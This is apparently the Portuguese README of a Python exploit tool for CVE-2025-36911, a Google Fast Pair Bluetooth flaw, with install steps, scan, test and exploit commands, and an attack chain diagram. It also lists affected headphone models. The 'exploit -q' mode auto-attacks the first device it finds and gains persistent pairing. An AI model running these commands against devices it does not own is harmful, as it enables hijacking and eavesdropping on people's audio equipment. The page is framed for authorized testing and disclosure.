
Exploit da vulnerabilidade CVE-2025-36911 em Python para testar nosso próprio equipamento
Ferramenta de exploração rápida para CVE-2025-36911 em Python para testar nossos equipamentos
Autor: Sébastien Dudek (@FlUxIuS) @ Penthertz
Créditos: whisperpair.eu pela descoberta e este belo APK do @ZalexDev que encurtou o tempo de implementação wpair-app
Somente para pesquisa de segurança autorizada. Teste apenas em dispositivos que você possui.
CVE-2025-36911 afeta implementações do Google Fast Pair em milhões de dispositivos de áudio Bluetooth.
Comportamento normal: Dispositivos só devem aceitar solicitações de pareamento quando estiverem em modo de pareamento (botão pressionado, estojo aberto, etc.)
Comportamento vulnerável: Dispositivos aceitam solicitações de Key-Based Pairing (KBP) a qualquer momento, mesmo quando ociosos ou já pareados.
# Instalação
pip install bleak cryptography
git clone https://github.com/Penthertz/CVE-2025-36911-exploit.git
cd CVE-2025-36911-exploit
# Escaneie por alvos
python3 whisperpair-cli.py scan
# Teste se é vulnerável
python3 whisperpair-cli.py test AA:BB:CC:DD:EE:FF
# Explore
python3 whisperpair-cli.py exploit --quick
┌─────────────────────────────────────────────────────────────┐
│ ATACANTE DISPOSITIVO VULNERÁVEL │
│ │
│ 1. Escaneamento BLE ────────────────► Anúncio Fast Pair │
│ (Encontrar alvo) (ID do modelo visível)│
│ │
│ 2. Conectar ──────────────────────────► Conexão GATT │
│ │
│ 3. Solicitação KBP ──────────────────► Característica KBP │
│ (Deveria ser rejeitada ✗ NÃO REJEITADA! │
│ quando não em modo pareamento) (CVE-2025-36911) │
│ │
│ 4. Interpretar Resposta ◄────────────── Endereço BR/EDR │
│ │
│ 5. Escrever Chave de Conta ──────────► Característica CK │
│ (Acesso persistente) ✓ ACEITA │
│ │
│ 6. Pareamento BT Clássico ──────────► Perfis de Áudio │
│ (Game over) (A2DP) │
└─────────────────────────────────────────────────────────────┘
A ferramenta tenta múltiplas estratégias automaticamente:
Testados como vulneráveis (verifique atualizações de firmware):
| Comando | Descrição |
|---|
scan | Escaneamento BLE com atualização ao vivo para dispositivos Fast Pair |
scan -a | Escaneamento de todos os dispositivos BLE |
info <addr> | Mostra serviços/características GATT |
test <addr> | Verificação de vulnerabilidade não invasiva |
exploit <addr> | Cadeia de exploração completa |
exploit -q | Auto-escaneamento + exploração do primeiro alvo |
| Marca | Modelos |
|---|
| Pixel Buds Pro 2 (mas recebe atualizações rapidamente com telefones Pixel) | |
| Sony | WH-1000XM4, WH-1000XM5/XM6, LinkBuds S, WH-CH520 |
| JBL | JBL TUNE BEAM |
| Anker | Soundcore Liberty 4 NC |
| Jabra | Elite 8 Active |
| + muitos outros | whisperpair.eu |